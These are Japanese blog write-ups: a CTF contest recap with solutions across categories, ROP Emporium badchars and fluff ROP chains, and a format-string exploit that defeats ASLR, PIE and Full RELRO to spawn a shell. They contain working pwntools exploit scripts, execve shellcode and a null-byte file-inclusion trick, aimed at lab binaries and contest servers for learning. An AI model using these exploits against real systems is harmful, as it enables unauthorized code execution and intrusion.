雑

CTFの問題は割と解いた事があったのですが、CTFのコンテスト自体に参加するのは始めてでした。

全体として1310点、1974人中201位で割と良かったのかなと思います。

ですが、Web系の知識の欠如が深刻な事に気づきました。Web、範囲が広すぎてどこから手を出せばいいのか...

CTFやると競プロが手につかなくなり、競プロやるとCTFが手につかなくなる、これどうすりゃいいの！！

？？？「あれ、学業はどうしたんですか？」

Web

600人以上解いてるLadybugが解けませんでした。チクショー！

結局ACは1問だけです。

Bite

?page=hoge で読み込んでいるので、hogeの部分にflagを入れたら出てくるかなーと思ったらヒントが出てきました。

しかし、page=/flag.txt と入れると最後に.phpが付けられてしまいます。

そこで、null byteを表す %00 をURLの最後につけてやると、FLAGが表示されました。

かなり有名なテクニックですね。

Crypto

Pythonのいい勉強になりました。

Tyrannosaurus

配布されたファイルの中身

#!/usr/bin/env python

import base64
import binascii

h = binascii.hexlify
b = base64.b64encode

c = b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067'


def enc(f):
    e = b(f)
    z = []
    i = 0
    while i < len(e):
        z += [e[i] ^ e[((i + 1) % len(e))]]
        i = i + 1
    c = h(bytearray(z))
    return c

cというのは、enc(c)をした後の値でしょう。

XORがぐるぐる回っているので、1文字目を全部調べればどれかは正解です。

月刊競技プログラミングは役に立つ

そこで、以下のようなコードを書くとflagが出力されました。

#!/usr/bin/env python

import base64
import binascii

h = binascii.hexlify
b = base64.b64encode

c = b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067'

g = binascii.unhexlify
bb = base64.b64decode


def dec(f):
    f = g(f)
    print(f)
    for i in range(0x100):
        ans = ""
        ans += chr(i)
        now = i
        for j in range(len(f)-1):
            memo=int(f[j:j+1].hex(),16)
            ans+=chr(now^memo)
            now^=memo
        try:
            flag=bb(ans)
            if b"flag" in flag:
                print(flag)
        except:
            pass


dec(c)

Perfect XOR

配布されたファイル

import base64
n = 1
i = 0
cipher_b64 = b"MTE0LDg0LDQzNyw4MDk1LDMzNTUwNDM0LDg1ODk4NjkxNzAsMTM3NDM4NjkxMzc2LDIzMDU4NDMwMDgxMzk5NTIyMzUsMjY1ODQ1NTk5MTU2OTgzMTc0NDY1NDY5MjYxNTk1Mzg0MjI0NSwxOTE1NjE5NDI2MDgyMzYxMDcyOTQ3OTMzNzgwODQzMDM2MzgxMzA5OTczMjE1NDgxNjkyOTQsMTMxNjQwMzY0NTg1Njk2NDgzMzcyMzk3NTM0NjA0NTg3MjI5MTAyMjM0NzIzMTgzODY5NDMxMTc3ODM3MjgyMjMsMTQ0NzQwMTExNTQ2NjQ1MjQ0Mjc5NDYzNzMxMjYwODU5ODg0ODE1NzM2Nzc0OTE0NzQ4MzU4ODkwNjYzNTQzNDkxMzExOTkxNTIyMTYsMjM1NjI3MjM0NTcyNjczNDcwNjU3ODk1NDg5OTY3MDk5MDQ5ODg0Nzc1NDc4NTgzOTI2MDA3MTAxNDMwMjc1OTc1MDYzMzcyODMxNzg2MjIyMzk3MzAzNjU1Mzk2MDI2MDA1NjEzNjAyNTU1NjY0NjI1MDMyNzAxNzUwNTI4OTI1NzgwNDMyMTU1NDMzODI0OTg0Mjg3NzcxNTI0MjcwMTAzOTQ0OTY5MTg2NjQwMjg2NDQ1MzQxMjgwMzM4MzE0Mzk3OTAyMzY4Mzg2MjQwMzMxNzE0MzU5MjIzNTY2NDMyMTk3MDMxMDE3MjA3MTMxNjM1Mjc0ODcyOTg3NDc0MDA2NDc4MDE5Mzk1ODcxNjU5MzY0MDEwODc0MTkzNzU2NDkwNTc5MTg1NDk0OTIxNjA1NTU2NDcwODcsMTQxMDUzNzgzNzA2NzEyMDY5MDYzMjA3OTU4MDg2MDYzMTg5ODgxNDg2NzQzNTE0NzE1NjY3ODM4ODM4Njc1OTk5OTU0ODY3NzQyNjUyMzgwMTE0MTA0MTkzMzI5MDM3NjkwMjUxNTYxOTUwNTY4NzA5ODI5MzI3MTY0MDg3NzI0MzY2MzcwMDg3MTE2NzMxMjY4MTU5MzEzNjUyNDg3NDUwNjUyNDM5ODA1ODc3Mjk2MjA3Mjk3NDQ2NzIzMjk1MTY2NjU4MjI4ODQ2OTI2ODA3Nzg2NjUyODcwMTg4OTIwODY3ODc5NDUxNDc4MzY0NTY5MzEzOTIyMDYwMzcwNjk1MDY0NzM2MDczNTcyMzc4Njk1MTc2NDczMDU1MjY2ODI2MjUzMjg0ODg2MzgzNzE1MDcyOTc0MzI0NDYzODM1MzAwMDUzMTM4NDI5NDYwMjk2NTc1MTQzMzY4MDY1NTcwNzU5NTM3MzI4MjQy"

def a(n):
    b = 0
    for i in range(1, n):
        if(n % i == 0):
            b += i
    return b == n

print("flag{", end='', flush=True)
cipher = base64.b64decode(cipher_b64).decode().split(",")
while(i < len(cipher)):
    if (a(n)):
        print(chr(int(cipher[i]) ^ n), end='', flush=True)
        i += 1
    n+=1

print("}")

コードを読むと、どうやら完全数の時だけ出力しているようですね。完全数は非常に大きいので、この調子ではいつまで経っても終わりません。

cipherの長さが14とかなので、完全数でググって出てきたのを貼るとFLAGが出力されました。

import base64
cipher_b64 = b"MTE0LDg0LDQzNyw4MDk1LDMzNTUwNDM0LDg1ODk4NjkxNzAsMTM3NDM4NjkxMzc2LDIzMDU4NDMwMDgxMzk5NTIyMzUsMjY1ODQ1NTk5MTU2OTgzMTc0NDY1NDY5MjYxNTk1Mzg0MjI0NSwxOTE1NjE5NDI2MDgyMzYxMDcyOTQ3OTMzNzgwODQzMDM2MzgxMzA5OTczMjE1NDgxNjkyOTQsMTMxNjQwMzY0NTg1Njk2NDgzMzcyMzk3NTM0NjA0NTg3MjI5MTAyMjM0NzIzMTgzODY5NDMxMTc3ODM3MjgyMjMsMTQ0NzQwMTExNTQ2NjQ1MjQ0Mjc5NDYzNzMxMjYwODU5ODg0ODE1NzM2Nzc0OTE0NzQ4MzU4ODkwNjYzNTQzNDkxMzExOTkxNTIyMTYsMjM1NjI3MjM0NTcyNjczNDcwNjU3ODk1NDg5OTY3MDk5MDQ5ODg0Nzc1NDc4NTgzOTI2MDA3MTAxNDMwMjc1OTc1MDYzMzcyODMxNzg2MjIyMzk3MzAzNjU1Mzk2MDI2MDA1NjEzNjAyNTU1NjY0NjI1MDMyNzAxNzUwNTI4OTI1NzgwNDMyMTU1NDMzODI0OTg0Mjg3NzcxNTI0MjcwMTAzOTQ0OTY5MTg2NjQwMjg2NDQ1MzQxMjgwMzM4MzE0Mzk3OTAyMzY4Mzg2MjQwMzMxNzE0MzU5MjIzNTY2NDMyMTk3MDMxMDE3MjA3MTMxNjM1Mjc0ODcyOTg3NDc0MDA2NDc4MDE5Mzk1ODcxNjU5MzY0MDEwODc0MTkzNzU2NDkwNTc5MTg1NDk0OTIxNjA1NTU2NDcwODcsMTQxMDUzNzgzNzA2NzEyMDY5MDYzMjA3OTU4MDg2MDYzMTg5ODgxNDg2NzQzNTE0NzE1NjY3ODM4ODM4Njc1OTk5OTU0ODY3NzQyNjUyMzgwMTE0MTA0MTkzMzI5MDM3NjkwMjUxNTYxOTUwNTY4NzA5ODI5MzI3MTY0MDg3NzI0MzY2MzcwMDg3MTE2NzMxMjY4MTU5MzEzNjUyNDg3NDUwNjUyNDM5ODA1ODc3Mjk2MjA3Mjk3NDQ2NzIzMjk1MTY2NjU4MjI4ODQ2OTI2ODA3Nzg2NjUyODcwMTg4OTIwODY3ODc5NDUxNDc4MzY0NTY5MzEzOTIyMDYwMzcwNjk1MDY0NzM2MDczNTcyMzc4Njk1MTc2NDczMDU1MjY2ODI2MjUzMjg0ODg2MzgzNzE1MDcyOTc0MzI0NDYzODM1MzAwMDUzMTM4NDI5NDYwMjk2NTc1MTQzMzY4MDY1NTcwNzU5NTM3MzI4MjQy"

    
perfect=[
6,
28,
496,
8128,
33550336,
8589869056,
137438691328,
2305843008139952128,
2658455991569831744654692615953842176,
191561942608236107294793378084303638130997321548169216,
13164036458569648337239753460458722910223472318386943117783728128,
14474011154664524427946373126085988481573677491474835889066354349131199152128,
23562723457267347065789548996709904988477547858392600710143027597506337283178622239730365539602600561360255566462503270175052892578043215543382498428777152427010394496918664028644534128033831439790236838624033171435922356643219703101720713163527487298747400647801939587165936401087419375649057918549492160555646976,
141053783706712069063207958086063189881486743514715667838838675999954867742652380114104193329037690251561950568709829327164087724366370087116731268159313652487450652439805877296207297446723295166658228846926807786652870188920867879451478364569313922060370695064736073572378695176473055266826253284886383715072974324463835300053138429460296575143368065570759537328128
]

print("flag{", end='', flush=True)
cipher = base64.b64decode(cipher_b64).decode().split(",")
for i in range(len(cipher)):
    if True:
        print(chr(int(cipher[i]) ^ perfect[i]), end='', flush=True)
        i += 1

print("}")

こっちの方が簡単な気がします。

Binary Exploitation

割と得意分野なのに、1問しか解けなくて悲しい...

Pancakes

BOFがありました。secret_recipeっていうFLAGを出力する関数があったので、これを呼びます。

やるだけ

from pwn import *
#p=process("./pancakes")
p=remote("jh2i.com",50021)
elf=ELF("./pancakes")
payload=b"A"*152
payload+=p64(elf.symbols['secret_recipe'])
p.sendline(payload)
print(p.recvall())

Steganography

色々ググりながらやっていく内に、解ける問題が増えました。

Spy vs. Spy

stegsolveをダウンロードして、ファイルを解析すると解けます。

stegsolveの存在を知らず、だいぶ悩んでいました。

Chess Cheater

自分の耳で解析するのは中々無理があるので、ツールに頼りましょう。

モールス信号を音からデコードしてくれるやつ に投げます。解けます。おしまい！

Busted

画像ファイルのExifを解析すると、ctrl+alt+e とコメントしてありました。そこで、steghideのextract時のパスフレーズにctrl+alt+eを入れると、flag.txtが展開されました。個人的に好きな問題です。

Scripting

1問目のMisdirectionが解けなかったのがかなり悔しいですね...

やはりWeb系が壊滅的です。

Prophecy

接続すると、数を当てろと言われるので乱数かと思ったら固定値でした。

そのため、1つずつ数を確定していけばいいのですが、手作業だときつそうのでスクリプトを書きました。（Scriptingだしね！）

from pwn import *

lst=[]
while True:
    print(lst)
    p=remote("jh2i.com",50012)
    for i in range(len(lst)):
        p.sendlineafter(b"W H A T I S T H E N E X T N U M B E R T O C O M E F R O M T H E F U T U R E ?",str(lst[i]));
    p.sendline(b"1000000000000000000000000000")
    try:
        p.recvuntil(b"T H E C O R R E C T N U M B E R W A S ")
        lst.append(int(p.recvline().decode('utf-8')))
    except :
        print(p.recvall())
        break

答えの数列の長さは20でした。まぁ、手作業でもできないことはないか。

Tootsie Pop

Zipファイルが与えられるのですが、いくら展開してもファイルがあります。

gzip,xz,bunzip2,zipで適当な順番で途方もない回数で圧縮されているようでした。

しばらく手作業でやった後、ファイルのサイズが一向に減らない事に気づきスクリプトを書きましたが、時々止まるのでその度に手作業でちょっと直すというクソスクリプトなので載せるのはやめておきます。

Misc

Cat Cage

grepが出せないなーと思ったら、/bin/grep で行けました。

また、

/bin/grep -r flag ./*

だとダメだったのに

/bin/grep -r flag{ ./*

だとFLAGが出力されました。なんでだろ？

His Story

なんか解いてたんですが、解法が思い出せません...

/bin/cat flag.txt

で解けて驚いたとかの記憶があったようななかったような...

さっき見たらスラッシュが入れられなくなっていました。解いた時はそうじゃなかったような気が??

勘違いかもです。不正疑惑

Forensics

あんまりまともに解けませんでした。SteganoってForensicsに含まれないんですかね？

Opposable Thumbs

foremostにかけると、flagの表示された画像が中に入っていた事が分かります。終わり

Warmups

Read The Rules

ルールのHTMLの下の方に、flagがコメントされていました。

Caesar Mirror

シーザー暗号/ROT13です。有名ですね。

Common Place

"I found it"と言っていた rfc5785 でググると、(hoge)/.well_known を調べるみたいな事が書かれてたので適当に入れたら本当にありました。

そこにディレクトリ一覧があり、flag.txtもそこにありました。

Internet Cattos

一見するとflagが見えませんが、

nc jh2i.com 50003 > nc.txt

とすると、中にflagが書かれていました。

多分バッファの位置を改行する度に上に持っていってるとかですよね。

Hexgedit

写真のHexの中に flag{が含まれているに違いないので、flag{を16進数に変換した

66 6c 61 67 7b

を探すと、ファイルの末尾にありました。

Private Investigator

RSAの秘密鍵が渡されるので、それを使って問題文に書いてある通りに接続すれば良いです。

chmod 777 *

とかやると、権限不備で弾かれるので注意。

Vencryption

fileコマンドで調べると、Vim encrypted file data と書かれていたのでググると、

VimDecrypt というツールが見つかるのでダウンロードします。

rockyou.txt というパスワードの候補を使って総当りするとパスワードは computerである事が分かるので、上のツールでdecryptするとflagが表示されました。

作者さん、ありがとう！！！

コンテスト後に理解した問題集

Mobile one

これ、stringsだけで解けたっぽい。apkをdex2jarで解析してた時間を返してくれ...

基本を忘れた報いですね。

Ladybug

なんか存在しないページ出すとAssertion Errorが起きるのは分かっていたんですが、まさかそこからコマンドが開けるとは思いませんでした。

f=open("flag.txt")
print(f.read())

Pseudo

/etc/sudoers.d に機密情報が入ってるよーという話でした。

なるほどなぁ

Spaghetti

binwalkする所までは分かっていたんですが、zlib をどうするかが分かりませんでした。展開してもほぼ情報もないし...

Online File Viewer にかけると解けるっぽいです。よく分からないけど解けたからヨシ（？？）

ポエム

コンテストの復習はして、後は再来週のAPIOに備えようと思います。

マジで最近競プロやらなさすぎなので。。。

では、Happy Hacking!

ROP Emporium埋め 前半の続きです。

後半、書くことが長くなるので更に2つに分けます。

環境 : Ubuntu 20.04 LTS

$ lsb_release -a
LSB Version:    core-11.1.0ubuntu2-noarch:printing-11.1.0ubuntu2-noarch:security-11.1.0ubuntu2-noarch
Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:    20.04
Codename:   focal

5. badchars

32bit

badcharsとして、b i c / <space> f n sを入力文字列に入れると変えられるという仕組みになっています。

明らかに/bin/sh意識してますよね。そこでusefulGadgetsを見てみると...

08048890 <usefulGadgets>:
 8048890:   30 0b                   xor    BYTE PTR [ebx],cl
 8048892:   c3                      ret    
 8048893:   89 37                   mov    DWORD PTR [edi],esi
 8048895:   c3                      ret    
 8048896:   5b                      pop    ebx
 8048897:   59                      pop    ecx
 8048898:   c3                      ret    
 8048899:   5e                      pop    esi
 804889a:   5f                      pop    edi
 804889b:   c3                      ret    
 804889c:   66 90                   xchg   ax,ax
 804889e:   66 90                   xchg   ax,ax

前回同様 mov [edi],esi がありますが、これに加えて xor [ebx],cl もあります。

clというのはecxの下位8bitです。ついでにpop ebx; pop ecx;もありますね。/bin/shをxorでエンコードしろって事なんでしょうか。

という訳で、ROPの流れとしては

1. bss領域に/bin/shそれぞれの文字を0xffとのxorでエンコードしたものを書き込む。
2. ecxに0xffを書き込み、clを0xffにする。
3. ebxに文字を読み込み、1文字ずつxorでデコードする。
4. system('/bin/sh')を呼び出す。

xorは2n回やれば元に戻ります。月刊競技プログラミングは役に立つ！

from pwn import *
def f(s):
    res=0
    s=s[::-1]
    for i in s:
        res+=ord(i)
        res*=0x100
    return res//0x100
    
elf=ELF("./badchars32")
p=process("./badchars32")

payload=b"A"*44
payload+=p32(0x8048899) # pop esi; pop edi; ret;
payload+=p32(f('/bin')^0xffffffff)
payload+=p32(elf.bss())
payload+=p32(0x8048893) # mov [edi],esi; ret;
payload+=p32(0x8048899) # pop esi; pop edi; ret;
payload+=p32(f('/sh\x00')^0xffffffff)
payload+=p32(elf.bss()+0x4)
payload+=p32(0x8048893) # mov [edi],esi; ret;
payload+=p32(0x8048897) # pop ecx; ret;
payload+=p32(0xff)

for i in range(8):
    payload+=p32(0x08048916) # pop ebx; ret;
    payload+=p32(elf.bss()+i)
    payload+=p32(0x8048890) # xor [ebx],cl; ret;

payload+=p32(elf.plt['system'])
payload+=b"AAAA"
payload+=p32(elf.bss())

p.sendlineafter(b"n s\n> ",payload)
p.interactive()

シェルが起動すると気持ちが良いですね。 あ＾〜たまらねえぜ。

64bit

/bin/sh\x00の最後までデコードしようとすると何故か落ちるので、途中までにしました（なんで？？？）

理由が分かる方いたらコメントお願いします。

from pwn import *
elf=ELF("./badchars")
p=process("./badchars")

def f(s):
    res=0
    s=s[::-1]
    for i in s:
        res+=ord(i)
        res*=0x100
    return res//0x100

payload=b"A"*40
payload+=p64(0x400b33) # ret;
payload+=p64(0x400b3b) # pop r12; pop r13; ret;
payload += p64(f('/bin/sh\x00')^0x0000ffffffffffff)
payload+=p64(elf.bss())
payload+=p64(0x400b34) # mov[r13],r12; ret;

for i in range(6):
    payload+=p64(0x400b40) # pop r14; pop r15; ret;
    payload+=p64(0xff)
    payload+=p64(elf.bss()+i)
    payload+=p64(0x400b30) # xor [r15],r14; ret;

payload+=p64(0x00400b39) # pop rdi; ret;
payload+=p64(elf.bss())
payload+=p64(elf.plt['system'])

p.sendlineafter(b"f n s\n> ",payload)
p.interactive()

6. fluff

32bit

この問題好き過ぎる！パズルになっててマジで楽しい！！！競プロと似た感覚ですね。

questionableGadgets関数の中身はこうなっています。

08048670 <questionableGadgets>:
 8048670:   5f                      pop    edi
 8048671:   31 d2                   xor    edx,edx
 8048673:   5e                      pop    esi
 8048674:   bd be ba fe ca          mov    ebp,0xcafebabe
 8048679:   c3                      ret    
 804867a:   5e                      pop    esi
 804867b:   31 da                   xor    edx,ebx
 804867d:   5d                      pop    ebp
 804867e:   bf be ba ad de          mov    edi,0xdeadbabe
 8048683:   c3                      ret    
 8048684:   bf ef be ad de          mov    edi,0xdeadbeef
 8048689:   87 ca                   xchg   edx,ecx
 804868b:   5d                      pop    ebp
 804868c:   ba d0 ce fa de          mov    edx,0xdefaced0
 8048691:   c3                      ret    
 8048692:   5f                      pop    edi
 8048693:   89 11                   mov    DWORD PTR [ecx],edx
 8048695:   5d                      pop    ebp
 8048696:   5b                      pop    ebx
 8048697:   30 19                   xor    BYTE PTR [ecx],bl
 8048699:   c3                      ret    
 804869a:   66 90                   xchg   ax,ax
 804869c:   66 90                   xchg   ax,ax
 804869e:   66 90                   xchg   ax,ax

これを組み合わせてbss領域に/bin/sh\x00を書き込みましょう！

まず、書き込むのは0x8048693のmov [ecx],edxだろうと容易に予想がつきますね。

残念ながらpop ecxもpop edxもないので、上手くecx,edxに値を代入する必要があります。

ここで、0x804867bのxor edx,ebxと0x804868cのmov edx,0xdefaced0に注目しましょう。 edxに0xdefaced0を代入してから、edxをebxでxorを取ることで任意値を代入できます（バイナリ内にpop ebxもあります）。

edxに任意値を代入する事ができたので、次はecxに注目してみます。0x8048689でxchg edx,ecxがありますね。つまり、edxに任意値を 代入した後でこの命令を走らせれば、ecxに任意値を書き込む事ができます。

これでedx,ecxに任意値を書き込む事ができる事が分かりました。最後のmov命令では、retまでの間にecxにblでxorを取っていますが、 blはebxの下位8bitなので、1つ前のpop ebxでebxに0を入れておけば何も起きません。

というわけで、エクスプロイトコードは以下のようになります。 一発でシェルが起動した時はかなりの快感でしたね。

from pwn import *
elf=ELF("./fluff32")
p=process("./fluff32")

def f(s):
    res=0
    s=s[::-1]
    for i in s:
        res+=ord(i)
        res*=0x100
    return res//0x100

payload=b"A"*44

def rewrite(ecx,edx):
    res=b""
    res+=p32(0x0804868c) # mov edx,0xdefaced0; ret;
    res+=p32(0x080483e1) # pop ebx; ret;
    res+=p32(ecx^0xdefaced0)
    res+=p32(0x0804867b) # xor edx,ebx; pop ebp; mov edi,0xdeadbabe; ret;
    res+=p32(0)
    res+=p32(0x08048689) # xchg edx,ecx; pop ebp; mov edx,0xdefaced0; ret;
    res+=p32(0)
    res+=p32(0x080483e1) # pop ebx; ret;
    res+=p32(f(edx)^0xdefaced0)
    res+=p32(0x0804867b) # xor edx,ebx; pop ebp; mov edi,0xdeadbabe; ret;
    res+=p32(0)
    res+=p32(0x08048693) # mov DWORD PTR [ecx],edx; pop ebp; pop ebx; xor [ecx],bl; ret;
    res+=p32(0)
    res+=p32(0)
    return res

payload+=rewrite(elf.bss(),'/bin')
payload+=rewrite(elf.bss()+4,'/sh\x00')

payload+=p32(elf.plt['system'])
payload+=b"AAAA"
payload+=p32(elf.bss())

p.sendline(payload)
p.interactive()

64bit

レジスタの名前が変わった以外のロジックはほぼ同じです。

今回はretをダミーの後と、pltの呼び出し前に置いたら上手く行きました。

まぁpwntoolsの機能でgdbのattachできるのでmovapsで落ちてるとかはすぐ気がつけます。

from pwn import *
elf=ELF("./fluff")
p=process("./fluff")

def f(s):
    res=0
    s=s[::-1]
    for i in s:
        res+=ord(i)
        res*=0x100
    return res//0x100

payload=b"A"*40
payload+=p64(0x40082c) # ret;

def rewrite(r10,r11):
    res=b""
    res+=p64(0x400822) # xor r11,r11; pop r14; mov edi,0x601050; ret;
    res+=p64(0)
    res+=p64(0x400845) # mov r11d,0x602050; ret;
    res+=p64(0x400832) # pop r12; mov r13d,0x604060; ret;
    res+=p64(r10^0x602050)
    res+=p64(0x40082f) # xor r11,r12; pop r12; mov r13d,0x604060; ret;
    res+=p64(0)
    res+=p64(0x400840) # xchg r11,r10; pop r15; mov r11d,0x602050; ret;
    res+=p64(0)

    res+=p64(0x400822) # xor r11,r11; pop r14; mov edi,0x601050; ret;
    res+=p64(0)
    res+=p64(0x400845) # mov r11d,0x602050; ret;
    res+=p64(0x400832) # pop r12; mov r13d,0x604060; ret;
    res+=p64(f(r11)^0x602050)
    res+=p64(0x40082f) # xor r11,r12; pop r12; mov r13d,0x604060; ret;
    res+=p64(0)
    res+=p64(0x40084e) # mov QWORD PTR [r10],r11; pop r13; pop r12; xor BYTE PTR [r10],r12b; ret;
    res+=p64(0)
    res+=p64(0)
    return res

payload+=rewrite(elf.bss(),'/bin/sh\x00')
payload+=p64(0x40082c) # ret;
payload+=p64(0x004008c3) # pop rdi; ret;
payload+=p64(elf.bss())
payload+=p64(elf.plt['system'])

p.sendline(payload)
p.interactive()

これはASLR+PIEとformat string attackによるInformation Leak - ももいろテクノロジーと RELROとformat string attackによるリターンアドレス書き換え - ももいろテクノロジー の合わせ技みたいなやつのメモです。

ASLR + Full RELRO + NX bit + PIE + SSP の状態でFSBからのシェルの起動までをやります。

環境

Ubuntu 20.04LTS 64bit

$ uname -a
Linux defineprogram-dynabook-T45-GG 5.4.0-33-generic #37-Ubuntu SMP Thu May 21 12:53:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

$ lsb_release -a
LSB Version:    core-11.1.0ubuntu2-noarch:printing-11.1.0ubuntu2-noarch:security-11.1.0ubuntu2-noarch
Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:    20.04
Codename:   focal

$ gcc --version
gcc (Ubuntu 9.3.0-10ubuntu2) 9.3.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

攻撃対象のコード

//fsb.c
#include <stdio.h>

void vuln()
{
    char buf[200];
    for(int i=0;i<3;i++) {
        fgets(buf, sizeof(buf), stdin);
        printf(buf);
        fflush(stdout);
    }
}

int main()
{
    vuln();
    return 0;
}

なんで3回かと言うと、後で3回に分けて攻撃するからです。

64bitのエクスプロイトは難しいので、32bitでやります。

gcc -m32 -Wl,-z,relro,-z,now -o fsb fsb.c

指針

ASLR+PIEとformat string attackによるInformation Leak - ももいろテクノロジーでは、アドレスをリークした上でfflushのアドレスを FSAでGOT Overwriteしてシェルコードのあるアドレスに向かせてシェルを奪っています（NX bit無効かつFull RELROでない事が条件）。 一方、RELROとformat string attackによるリターンアドレス書き換え - ももいろテクノロジーではmain関数のリターンアドレスをsystem関数に向かわせてシェルを奪っています（ASLRが無効なのが条件）。

というわけで、合わせるとアドレスをリークした上でリターンアドレスをsystem関数に向かわせるという事になりますね。

これならNX bitにもRELROにも引っかかりません。

エクスプロイトコード

エクスプロイトコードは、大体ASLR+PIEとformat string attackによるInformation Leak - ももいろテクノロジーをpwntools使って書き直したようなものです。

アドレスによってはエラー出そうなのあるけど許して

エクスプロイトする時には、アドレスの入ってるアドレスなのか、それとも実際のアドレスなのか、そしてoffsetなのか実際のアドレスなのか混同しがちなので注意です。

さて、エクスプロイトの流れを軽く説明します。

Round 1 以前

以下の情報を持ちます。これらはPIEやASLRとは関係なく一定です。

• bufferがFSBで何番目に現れるか
• vulnからのreturn addressの置かれているアドレスのbufferからのoffset
• vulnを呼び出す時に置かれるsaved ebp自体のbufferからのoffset
• __libc_start_mainのgotアドレスのoffset
• fflushのgotアドレスのoffset
• vulnからのreturn address自体のoffset
• libc内の__libc_start_mainのoffset

Round 1

FSBを利用して、

• return address自体
• saved ebp自体

をリークします。return address自体のoffsetが分かっているので、offsetを引く事でbaseが何かが分かります。

また、saved ebpとbufferとのoffsetも分かっているので、bufferのアドレスも分かります。

Round 2

base addressが判明し、libc_start_main(got)のoffsetも分かっているので、FSBによりlibc_start_mainの実際のアドレスが判明します。

__libc_start_mainのlibc内のoffsetは分かっているので、libc base addressが分かります（重要）

Round 3

Round 1でbufferのアドレスが判明しており、またbufferとreturn addressの入ってるアドレスのoffsetも判明しているのでreturn addressの入ってるアドレスも分かります。

後はreturn addressを書き換えるだけです。

libc baseがRound 2で判明しているので、systemや"/bin/sh"の実際のアドレスも分かります。

こちらもFSBで書き換えるだけ。Got OverwriteではないのでRELROには引っかかりません！

Round 3 の後

vulnからのreturn時にsystem("/bin/sh")が実行され、シェルが立ち上がります。

やったぜ！

# ret2libc.py
from pwn import *
index=5
offset_retaddr_from_buf=0xd8
offset_ebp_from_buf=0xe4

shellcode=b"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

elf=ELF("./fsb")
libc=ELF("/lib/i386-linux-gnu/libc.so.6")

offset_got_start=elf.got['__libc_start_main']
offset_got_fflush=elf.got['fflush']
offset_retaddr=0x12e3
offset_libc_start=libc.symbols['__libc_start_main']

log.info("offset_got_start={}".format(hex(offset_got_start)))
log.info("offset_got_fflush={}".format(hex(offset_got_fflush)))
log.info("offset_libc_start={}".format(hex(offset_libc_start)))

p=process("./fsb")

index_retaddr=index+offset_retaddr_from_buf//4

# Round 1

payload="%{}$08x".format(index_retaddr)
payload+="%{}$08x".format(index_retaddr-1)

p.sendline(payload)
line=p.recvline()

addr_retaddr=int(line[:8],16)
addr_ebp=int(line[8:],16)
base_addr=addr_retaddr-offset_retaddr
addr_buf=addr_ebp-offset_ebp_from_buf
log.info("base_addr:{}".format(hex(base_addr)))
log.info("addr_buf:{}".format(hex(addr_buf)))

# Round 2
payload=p32(base_addr+offset_got_start)
payload+=bytes("%{}$s".format(index).encode())
p.sendline(payload)
addr_libc_start=u32(p.recvline()[4:8])
base_libc_addr=addr_libc_start-offset_libc_start

log.success("libc base:{}".format(hex(base_libc_addr)))

# Round 3

address_retaddr=offset_retaddr_from_buf+addr_buf
offset_system=libc.symbols['system']
offset_binsh=next(libc.search(b"/bin/sh"))
writes={address_retaddr:base_libc_addr+offset_system,
        address_retaddr+8:base_libc_addr+offset_binsh}

payload=fmtstr_payload(index,writes)
p.sendline(payload)

p.interactive()

実行すると、一発でシェルが取れている事が分かります。

$ python3 ret2libc.py 
[*] '/home/defineprogram/Desktop/CTF/FSB_ASLR+PIE/fsb'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] offset_got_start=0x3fe0
[*] offset_got_fflush=0x3fd4
[*] offset_libc_start=0x1edf0
[+] Starting local process './fsb': pid 18696
[*] base_addr:0x565ca000
[*] addr_buf:0xffaa77a4
[+] libc base:0xf7da6000
[*] Switching to interactive mode
                                               \xc8                                                                                                                                       \x80                                     @                                                                                                                  %                                                %                                                                                                               h   1aaa|x\xaa\xff}x\xaa\xff~x\xaa\xff\x7fx\xaa\xff\x84x\xaa\xff\x85x\xaa\xff\x86x\xaa\xff\x87x\xaa\xff
$ id
uid=1000(defineprogram) gid=1000(defineprogram) groups=1000(defineprogram),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),1001(docker)